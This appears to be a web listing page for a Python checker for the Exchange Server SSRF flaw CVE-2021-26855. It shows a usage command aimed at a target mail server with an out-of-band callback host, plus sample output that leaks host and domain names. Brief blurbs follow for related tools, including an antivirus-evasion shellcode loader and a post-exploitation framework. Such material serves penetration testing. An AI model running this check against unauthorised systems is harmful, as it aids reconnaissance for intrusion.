PoC for CVE-2021-26855 -Just a checker-

Last update: Dec 22, 2022

Overview

CVE-2021-26855

PoC for CVE-2021-26855 -Just a checker-

Usage

python3 CVE-2021-26855.py -u https://mail.example.com -c example.burpcollaborator.net
# Checker for CVE-2021-26855: Exchange Server SSRF Vulnerability
# Coded by Abdullah AlZahrani https://Github.com/0xAbdullah
[*] You set target to https://mail.example.com
[#] This site is vulnerable to CVE-2021-26855 Check your collabrator client.
[-] Get some info about your target...
[#] Computer name: EXC-EXAMPLE
[#] Domain: EXC-EXAMPLE.EXAMPLE.local

Owner

Abdullah AlZahrani

PenTester & Python coder.

GitHub Repository

You can crack any zip file and get the password.

Zip-Cracker Video Lesson : This is a Very powerfull Zip File Crack tool for termux users. Check 500 000 Passwords in 30 seconds Unique Performance Che

13 Oct 24, 2022

We protect the privacy of the data on your computer by using the camera of your Debian based Pardus operating system. 🕵️

Pardus Lookout We protect the privacy of the data on your computer by using the camera of your Debian based Pardus operating system. The application i

19 Nov 18, 2022

XSS scanner in python

DeadXSS XSS scanner in python How to Download: Step 1: git clone https://github.com/Deadeye0x/DeadXSS.git Step 2: cd DeadXSS Step 3: python3 DeadXSS.p

2 Jul 17, 2022

CodeTest信息收集和漏洞利用工具

CodeTest信息收集和漏洞利用工具，可在进行渗透测试之时方便利用相关信息收集脚本进行信息的获取和验证工作，漏洞利用模块可选择需要测试的漏洞模块，或者选择所有模块测试，包含CVE-2020-14882, CVE-2020-2555等，可自己收集脚本后按照模板进行修改。

23 Mar 18, 2021

python写的一款免杀工具（shellcode加载器）BypassAV，国内杀软全过（windows denfend）

266 Jan 02, 2023

Coerce authentication from Windows hosts via MS-FSRVP (Requires FS-VSS-AGENT service running on host)

VSSTrigger Coerce authentication from Windows hosts via MS-FSRVP (Requires FS-VS

6 Jul 24, 2022

WpDisect is a wordpress hacking tool that finds vulnerabilities in wordpress.

wpdisect WpDisect is a wordpress hacking tool that finds misconfigurations in wordpress. Prerequisites You need to download wordpress in the wpdisect

3 Feb 20, 2022

IDA Python Script for anti ollvm

62 Dec 23, 2022

Bypass 4xx HTTP response status codes.

Forbidden Bypass 4xx HTTP response status codes. To see all the test cases, check the source code - follow the NOTE comments. Script uses multithreadi

165 Dec 28, 2022

Trainspotting - Python Dependency Injector based on interface binding

Choose dependency injection Friendly with MyPy Supports lazy injections Supports

3 Jan 26, 2022

Provides script to download and format public IP lists related to the Log4j exploit.

Provides script to download and format public IP lists related to the Log4j exploit. Current format includes: plain list, Cisco ASA Network Group.

1 Jan 02, 2022

Hashpic - Hashpic creates an image from a MD5 or SHA512 hash

Hashpic Hashpic creates an image from the MD5 hash of your input. Since v0.2.0 i

15 Nov 23, 2022

An open-source post-exploitation framework for students, researchers and developers.

Questions? Join the Discord support server Disclaimer: This project should be used for authorized testing or educational purposes only. BYOB is an ope

8.1k Dec 31, 2022

The next level Python obfuscator, nearly impossible to deobfuscate.

🐸 Kramer 🐸 Kramer is a next level obfuscation tool written in Python3 allowing you to obfuscate your Python3 code easily and securely. It uses Berse

114 Dec 26, 2022

Data Recovery from your broken Android phone

Broken Phone Recovery a guide how to backup data from your locked android phone if you broke your screen (and more) you can skip some steps depending

25 Sep 23, 2022

Tools for investigating Log4j CVE-2021-44228

Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re

91 Dec 29, 2022

This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired

26 Dec 26, 2022

Discord Token Stealer Malware Protection

TokenGuard TokenGuard, protect your account, prevent token steal. Totally free and open source Discord Server: https://discord.gg/EmwfaGuBE8 Source Co

10 Nov 23, 2022

Ensure secure infrastructure and consistency with the firewall rules

Python Port Scanner This script tries to check if it's possible to make a connection with the specific endpoint port. This is very useful to ensure se

7 Feb 26, 2022

A python based tool that executes various CVEs to gain root privileges as root on various MAC OS platforms.

MacPer A python based tool that executes various CVEs to gain root privileges as root on various MAC OS platforms. Not all of the exploits directly sp

20 Nov 30, 2022

PoC for CVE-2021-26855 -Just a checker-

Related tags

Overview

CVE-2021-26855

Usage

Owner

Abdullah AlZahrani

You can crack any zip file and get the password.

We protect the privacy of the data on your computer by using the camera of your Debian based Pardus operating system. 🕵️

XSS scanner in python

CodeTest信息收集和漏洞利用工具

python写的一款免杀工具（shellcode加载器）BypassAV，国内杀软全过（windows denfend）

Coerce authentication from Windows hosts via MS-FSRVP (Requires FS-VSS-AGENT service running on host)

WpDisect is a wordpress hacking tool that finds vulnerabilities in wordpress.

IDA Python Script for anti ollvm

Bypass 4xx HTTP response status codes.

Trainspotting - Python Dependency Injector based on interface binding

Provides script to download and format public IP lists related to the Log4j exploit.

Hashpic - Hashpic creates an image from a MD5 or SHA512 hash

An open-source post-exploitation framework for students, researchers and developers.

The next level Python obfuscator, nearly impossible to deobfuscate.

Data Recovery from your broken Android phone

Tools for investigating Log4j CVE-2021-44228

This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired

Discord Token Stealer Malware Protection

Ensure secure infrastructure and consistency with the firewall rules

A python based tool that executes various CVEs to gain root privileges as root on various MAC OS platforms.